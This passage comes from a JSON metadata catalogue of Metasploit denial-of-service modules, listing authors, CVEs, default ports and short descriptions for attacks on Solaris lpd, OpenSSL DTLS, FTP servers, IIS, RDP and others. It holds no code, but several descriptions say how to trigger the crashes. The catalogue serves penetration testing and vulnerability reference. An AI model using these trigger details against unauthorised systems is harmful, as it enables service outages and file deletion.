"full_name": "auxiliary/dos/solaris/lpd/cascade_delete",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"Optyx <optyx@uberhax0r.net>"
],
"description": "This module uses a vulnerability in the Solaris line printer\n daemon to delete arbitrary files on an affected system. This\n can be used to exploit the rpc.walld format string flaw, the\n missing krb5.conf authentication bypass, or simply delete\n system files. Tested on Solaris 2.6, 7, 8, 9, and 10.",
"references": [
"CVE-2005-4797",
"BID-14510",
"OSVDB-18650"
],
"platform": "",
"arch": "",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb",
"is_install_path": true,
"ref_name": "dos/solaris/lpd/cascade_delete",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/ssl/dtls_changecipherspec": {
"name": "OpenSSL DTLS ChangeCipherSpec Remote DoS",
"full_name": "auxiliary/dos/ssl/dtls_changecipherspec",
"rank": 300,
"disclosure_date": "2000-04-26",
"type": "auxiliary",
"author": [
"Jon Oberheide <jon@oberheide.org>",
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module performs a Denial of Service Attack against Datagram TLS in OpenSSL\n version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a\n ChangeCipherSpec Datagram before a ClientHello.",
"references": [
"CVE-2009-1386",
"OSVDB-55073"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-06 17:42:27 +0000",
"path": "/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb",
"is_install_path": true,
"ref_name": "dos/ssl/dtls_changecipherspec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/ssl/dtls_fragment_overflow": {
"name": "OpenSSL DTLS Fragment Buffer Overflow DoS",
"full_name": "auxiliary/dos/ssl/dtls_fragment_overflow",
"rank": 300,
"disclosure_date": "2014-06-05",
"type": "auxiliary",
"author": [
"Juri Aedla <asd@ut.ee>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module performs a Denial of Service Attack against Datagram TLS in\n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.\n When a DTLS ClientHello message has multiple fragments and the\n fragment lengths of later fragments are larger than that of the first, a\n buffer overflow occurs, causing a DoS.",
"references": [
"CVE-2014-0195",
"ZDI-14-173",
"BID-67900",
"URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002",
"URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048"
],
"platform": "",
"arch": "",
"rport": 4433,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb",
"is_install_path": true,
"ref_name": "dos/ssl/dtls_fragment_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/ssl/openssl_aesni": {
"name": "OpenSSL TLS 1.1 and 1.2 AES-NI DoS",
"full_name": "auxiliary/dos/ssl/openssl_aesni",
"rank": 300,
"disclosure_date": "2013-02-05",
"type": "auxiliary",
"author": [
"Wolfgang Ettlinger <wolfgang.ettlinger@gmail.com>"
],
"description": "The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the\n length of an encrypted message when used with a TLS version 1.1 or above. This\n leads to an integer underflow which can cause a DoS. The vulnerable function\n aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.\n This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default\n OpenSSL 1.0.1c package.",
"references": [
"CVE-2012-2686",
"URL-https://www.openssl.org/news/secadv/20130205.txt"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/ssl/openssl_aesni.rb",
"is_install_path": true,
"ref_name": "dos/ssl/openssl_aesni",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/syslog/rsyslog_long_tag": {
"name": "rsyslog Long Tag Off-By-Two DoS",
"full_name": "auxiliary/dos/syslog/rsyslog_long_tag",
"rank": 300,
"disclosure_date": "2011-09-01",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module triggers an off-by-two overflow in the\n rsyslog daemon. This flaw is unlikely to yield code execution\n but is effective at shutting down a remote log daemon. This bug\n was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.\n Compiler differences may prevent this bug from causing any\n noticeable result on many systems (RHEL6 is affected).",
"references": [
"CVE-2011-3200",
"URL-http://www.rsyslog.com/potential-dos-with-malformed-tag/",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=727644"
],
"platform": "",
"arch": "",
"rport": 514,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb",
"is_install_path": true,
"ref_name": "dos/syslog/rsyslog_long_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/tcp/claymore_dos": {
"name": "Claymore Dual GPU Miner Format String dos attack",
"full_name": "auxiliary/dos/tcp/claymore_dos",
"rank": 300,
"disclosure_date": "2018-02-06",
"type": "auxiliary",
"author": [
"res1n",
"bluebird"
],
"description": "Claymore's Dual GPU Miner 10.5 and below is vulnerable to a format string vulnerability. This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process, causing\n a denial of service.",
"references": [
"CVE-2018-6317",
"EDB-43972",
"URL-https://github.com/nanopool/Claymore-Dual-Miner"
],
"platform": "",
"arch": "",
"rport": 3333,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-29 06:09:40 +0000",
"path": "/modules/auxiliary/dos/tcp/claymore_dos.py",
"is_install_path": true,
"ref_name": "dos/tcp/claymore_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/tcp/junos_tcp_opt": {
"name": "Juniper JunOS Malformed TCP Option",
"full_name": "auxiliary/dos/tcp/junos_tcp_opt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module exploits a denial of service vulnerability\n in Juniper Network's JunOS router operating system. By sending a TCP\n packet with TCP option 101 set, an attacker can cause an affected\n router to reboot.",
"references": [
"BID-37670",
"OSVDB-61538",
"URL-http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/tcp/junos_tcp_opt.rb",
"is_install_path": true,
"ref_name": "dos/tcp/junos_tcp_opt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/tcp/synflood": {
"name": "TCP SYN Flooder",
"full_name": "auxiliary/dos/tcp/synflood",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "A simple TCP SYN flooder",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/tcp/synflood.rb",
"is_install_path": true,
"ref_name": "dos/tcp/synflood",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/upnp/miniupnpd_dos": {
"name": "MiniUPnPd 1.4 Denial of Service (DoS) Exploit",
"full_name": "auxiliary/dos/upnp/miniupnpd_dos",
"rank": 300,
"disclosure_date": "2013-03-27",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"Dejan Lukan"
],
"description": "This module allows remote attackers to cause a denial of service (DoS)\n in MiniUPnP 1.0 server via a specifically crafted UDP request.",
"references": [
"CVE-2013-0229",
"OSVDB-89625",
"BID-57607",
"URL-https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf"
],
"platform": "",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/upnp/miniupnpd_dos.rb",
"is_install_path": true,
"ref_name": "dos/upnp/miniupnpd_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/appian/appian_bpm": {
"name": "Appian Enterprise Business Suite 5.6 SP1 DoS",
"full_name": "auxiliary/dos/windows/appian/appian_bpm",
"rank": 300,
"disclosure_date": "2007-12-17",
"type": "auxiliary",
"author": [
"guiness.stout <guinness.stout@gmail.com>"
],
"description": "This module exploits a denial of service flaw in the Appian\n Enterprise Business Suite service.",
"references": [
"CVE-2007-6509",
"OSVDB-39500",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2007-12/0440.html"
],
"platform": "",
"arch": "",
"rport": 5400,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/appian/appian_bpm.rb",
"is_install_path": true,
"ref_name": "dos/windows/appian/appian_bpm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/browser/ms09_065_eot_integer": {
"name": "Microsoft Windows EOT Font Table Directory Integer Overflow",
"full_name": "auxiliary/dos/windows/browser/ms09_065_eot_integer",
"rank": 300,
"disclosure_date": "2009-11-10",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits an integer overflow flaw in the Microsoft Windows Embedded\n OpenType font parsing code located in win32k.sys. Since the kernel itself parses\n embedded web fonts, it is possible to trigger a BSoD from a normal web page when\n viewed with Internet Explorer.",
"references": [
"CVE-2009-2514",
"MSB-MS09-065",
"OSVDB-59869"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb",
"is_install_path": true,
"ref_name": "dos/windows/browser/ms09_065_eot_integer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/filezilla_admin_user": {
"name": "FileZilla FTP Server Admin Interface Denial of Service",
"full_name": "auxiliary/dos/windows/ftp/filezilla_admin_user",
"rank": 300,
"disclosure_date": "2005-11-07",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server Administration Interface in versions 0.9.4d and earlier.\n By sending a succession of excessively long USER commands to the FTP\n Server, the Administration Interface (FileZilla Server Interface.exe),\n when running, will overwrite the stack with our string and generate an\n exception. The FileZilla FTP Server itself will continue functioning.",
"references": [
"BID-15346",
"CVE-2005-3589",
"EDB-1336",
"OSVDB-20817"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/filezilla_admin_user",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/filezilla_server_port": {
"name": "FileZilla FTP Server Malformed PORT Denial of Service",
"full_name": "auxiliary/dos/windows/ftp/filezilla_server_port",
"rank": 300,
"disclosure_date": "2006-12-11",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server versions 0.9.21 and earlier. By sending a malformed PORT command\n then LIST command, the server attempts to write to a NULL pointer.",
"references": [
"BID-21542",
"BID-21549",
"CVE-2006-6565",
"EDB-2914",
"OSVDB-34435"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/filezilla_server_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/guildftp_cwdlist": {
"name": "Guild FTPd 0.999.8.11/0.999.14 Heap Corruption",
"full_name": "auxiliary/dos/windows/ftp/guildftp_cwdlist",
"rank": 300,
"disclosure_date": "2008-10-12",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable\n to heap corruption. You need to have a valid login\n so you can run CWD and LIST.",
"references": [
"CVE-2008-4572",
"OSVDB-49045",
"EDB-6738"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/guildftp_cwdlist",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_dos/windows/ftp/iis75_ftpd_iac_bof": {
"name": "Microsoft IIS FTP Server Encoded Response Overflow Trigger",
"full_name": "auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof",
"rank": 300,
"disclosure_date": "2010-12-21",
"type": "auxiliary",
"author": [
"Matthew Bergin",
"jduck <jduck@metasploit.com>"
],
"description": "This module triggers a heap overflow when processing a specially crafted\n FTP request containing Telnet IAC (0xff) bytes. When constructing the response,\n the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.\n\n This issue can be triggered pre-auth and may in fact be exploitable for\n remote code execution.",
"references": [
"CVE-2010-3972",
"OSVDB-70167",
"BID-45542",
"MSB-MS11-004",
"EDB-15803",
"URL-http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/iis75_ftpd_iac_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/iis_list_exhaustion": {
"name": "Microsoft IIS FTP Server LIST Stack Exhaustion",
"full_name": "auxiliary/dos/windows/ftp/iis_list_exhaustion",
"rank": 300,
"disclosure_date": "2009-09-03",
"type": "auxiliary",
"author": [
"Kingcope",
"Myo Soe"
],
"description": "This module triggers a Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n FTP account: either a read-only or write-access account, 2) \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type, and 3) there must be at least one\n directory under the FTP root directory. If the provided FTP account has write-access\n privilege and there is no directory, a new directory with a random name will be\n created prior to sending the exploit payload.",
"references": [
"CVE-2009-2521",
"BID-36273",
"OSVDB-57753",
"MSB-MS09-053",
"URL-https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/iis_list_exhaustion",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/solarftp_user": {
"name": "Solar FTP Server Malformed USER Denial of Service",
"full_name": "auxiliary/dos/windows/ftp/solarftp_user",
"rank": 300,
"disclosure_date": "2011-02-22",
"type": "auxiliary",
"author": [
"x000 <3d3n@hotmail.com.br>",
"C4SS!0 G0M3S <Louredo_@hotmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will send a format string as USER to Solar FTP, causing a\n READ violation in function \"__output_1()\" found in \"sfsservice.exe\"\n while trying to calculate the length of the string. This vulnerability\n affects versions 2.1.1 and earlier.",
"references": [
"EDB-16204"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/solarftp_user.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/solarftp_user",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/titan626_site": {
"name": "Titan FTP Server 6.26.630 SITE WHO DoS",
"full_name": "auxiliary/dos/windows/ftp/titan626_site",
"rank": 300,
"disclosure_date": "2008-10-14",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "The Titan FTP server v6.26 build 630 can be DoS'd by\n issuing \"SITE WHO\". You need a valid login so you\n can send this command.",
"references": [
"CVE-2008-6082",
"OSVDB-49177",
"EDB-6753"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/titan626_site.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/titan626_site",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_dos/windows/ftp/vicftps50_list": {
"name": "Victory FTP Server 5.0 LIST DoS",
"full_name": "auxiliary/dos/windows/ftp/vicftps50_list",
"rank": 300,
"disclosure_date": "2008-10-24",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "The Victory FTP Server v5.0 can be brought down by sending\n a very simple LIST command",
"references": [
"CVE-2008-2031",
"CVE-2008-6829",
"OSVDB-44608",
"EDB-6834"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/vicftps50_list",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_dos/windows/ftp/winftp230_nlst": {
"name": "WinFTP 2.3.0 NLST Denial of Service",
"full_name": "auxiliary/dos/windows/ftp/winftp230_nlst",
"rank": 300,
"disclosure_date": "2008-09-26",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "This module is a very rough port of Julien Bedard's\n PoC. You need a valid login, but even anonymous can\n do it if it has permission to call NLST.",
"references": [
"CVE-2008-5666",
"OSVDB-49043",
"EDB-6581"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/winftp230_nlst",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/xmeasy560_nlst": {
"name": "XM Easy Personal FTP Server 5.6.0 NLST DoS",
"full_name": "auxiliary/dos/windows/ftp/xmeasy560_nlst",
"rank": 300,
"disclosure_date": "2008-10-13",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "This module is a port of shinnai's script. You need\n a valid login, but even anonymous can do it as long\n as it has permission to call NLST.",
"references": [
"CVE-2008-5626",
"OSVDB-50837",
"EDB-6741"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/xmeasy560_nlst",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_dos/windows/ftp/xmeasy570_nlst": {
"name": "XM Easy Personal FTP Server 5.7.0 NLST DoS",
"full_name": "auxiliary/dos/windows/ftp/xmeasy570_nlst",
"rank": 300,
"disclosure_date": "2009-03-27",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "You need a valid login to DoS this FTP server, but\n even anonymous can do it as long as it has permission\n to call NLST.",
"references": [
"CVE-2008-5626",
"OSVDB-50837",
"EDB-8294"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/xmeasy570_nlst",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_dos/windows/games/kaillera": {
"name": "Kaillera 0.86 Server Denial of Service",
"full_name": "auxiliary/dos/windows/games/kaillera",
"rank": 300,
"disclosure_date": "2011-07-02",
"type": "auxiliary",
"author": [
"Sil3nt_Dre4m"
],
"description": "The Kaillera 0.86 server can be shut down by sending any malformed packet\n after the initial \"hello\" packet.",
"references": [
],
"platform": "",
"arch": "",
"rport": 27888,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/dos/windows/games/kaillera.rb",
"is_install_path": true,
"ref_name": "dos/windows/games/kaillera",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/http/ms10_065_ii6_asp_dos": {
"name": "Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service",
"full_name": "auxiliary/dos/windows/http/ms10_065_ii6_asp_dos",
"rank": 300,
"disclosure_date": "2010-09-14",
"type": "auxiliary",
"author": [
"Heyder Andrade <heyder@alligatorteam.org>",
"Leandro Oliveira <leadro@alligatorteam.org>"
],
"description": "The vulnerability allows remote unauthenticated attackers to force the IIS server\n to become unresponsive until the IIS service is restarted manually by the administrator.\n This requires that Active Server Pages are hosted by IIS and that an ASP script reads\n a POST form value.",
"references": [
"CVE-2010-1899",
"OSVDB-67978",
"MSB-MS10-065",
"EDB-15167"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb",
"is_install_path": true,
"ref_name": "dos/windows/http/ms10_065_ii6_asp_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/http/pi3web_isapi": {
"name": "Pi3Web ISAPI DoS",
"full_name": "auxiliary/dos/windows/http/pi3web_isapi",
"rank": 300,
"disclosure_date": "2008-11-13",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "The Pi3Web HTTP server crashes when a request is made for an invalid DLL\n file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs\n in this directory after installation are users.txt, install.daf and\n readme.daf.",
"references": [
"CVE-2008-6938",
"OSVDB-49998",
"EDB-7109"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/http/pi3web_isapi.rb",
"is_install_path": true,
"ref_name": "dos/windows/http/pi3web_isapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/llmnr/ms11_030_dnsapi": {
"name": "Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS",
"full_name": "auxiliary/dos/windows/llmnr/ms11_030_dnsapi",
"rank": 300,
"disclosure_date": "2011-04-12",
"type": "auxiliary",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer underrun vulnerability in Microsoft's DNSAPI.dll\n as distributed with Windows Vista and later without KB2509553. By sending a\n specially crafted LLMNR query, containing a leading '.' character, an attacker\n can trigger stack exhaustion or potentially cause stack memory corruption.\n\n Although this vulnerability may lead to code execution, it has not been proven\n to be possible at the time of this writing.\n\n NOTE: In some circumstances, a '.' may be found before the top of the stack is\n reached. In these cases, this module may not be able to cause a crash.",
"references": [
"CVE-2011-0657",
"OSVDB-71780",
"MSB-MS11-030"
],
"platform": "",
"arch": "",
"rport": 5355,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb",
"is_install_path": true,
"ref_name": "dos/windows/llmnr/ms11_030_dnsapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/nat/nat_helper": {
"name": "Microsoft Windows NAT Helper Denial of Service",
"full_name": "auxiliary/dos/windows/nat/nat_helper",
"rank": 300,
"disclosure_date": "2006-10-26",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a denial of service vulnerability\n within the Internet Connection Sharing service in\n Windows XP.",
"references": [
"OSVDB-30096",
"BID-20804",
"CVE-2006-5614"
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/nat/nat_helper.rb",
"is_install_path": true,
"ref_name": "dos/windows/nat/nat_helper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/rdp/ms12_020_maxchannelids": {
"name": "MS12-020 Microsoft Remote Desktop Use-After-Free DoS",
"full_name": "auxiliary/dos/windows/rdp/ms12_020_maxchannelids",
"rank": 300,
"disclosure_date": "2012-03-16",
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"Daniel Godas-Lopez",
"Alex Ionescu",
"jduck <jduck@metasploit.com>",
"#ms12-020"
],
"description": "This module exploits the MS12-020 RDP vulnerability originally discovered and\n reported by Luigi Auriemma. The flaw can be found in the way the T.125\n ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result\n in an invalid pointer being used, therefore causing a denial-of-service condition.",
"references": [
"CVE-2012-0002",
"MSB-MS12-020",
"URL-http://www.privatepaste.com/ffe875e04a",
"URL-http://pastie.org/private/4egcqt9nucxnsiksudy5dw",
"URL-http://pastie.org/private/feg8du0e9kfagng4rrg",
"URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html",
"EDB-18606",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update"
],
"platform": "",
"arch": "",
"rport": 3389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb",
"is_install_path": true,
"ref_name": "dos/windows/rdp/ms12_020_maxchannelids",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms05_047_pnp": {
"name": "Microsoft Plug and Play Service Registry Overflow",
"full_name": "auxiliary/dos/windows/smb/ms05_047_pnp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module triggers a stack buffer overflow in the Windows Plug\n and Play service. This vulnerability can be exploited on\n Windows 2000 without a valid user account. Since the PnP\n service runs inside the service.exe process, this module\n will result in a forced reboot on Windows 2000. Obtaining\n code execution is possible if user-controlled memory can\n be placed at 0x00000030, 0x0030005C, or 0x005C005C.",
"references": [
"CVE-2005-2120",
"MSB-MS05-047",
"BID-15065",
"OSVDB-18830"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms05_047_pnp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms06_035_mailslot": {
"name": "Microsoft SRV.SYS Mailslot Write Corruption",
"full_name": "auxiliary/dos/windows/smb/ms06_035_mailslot",
"rank": 300,
"disclosure_date": "2006-07-11",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
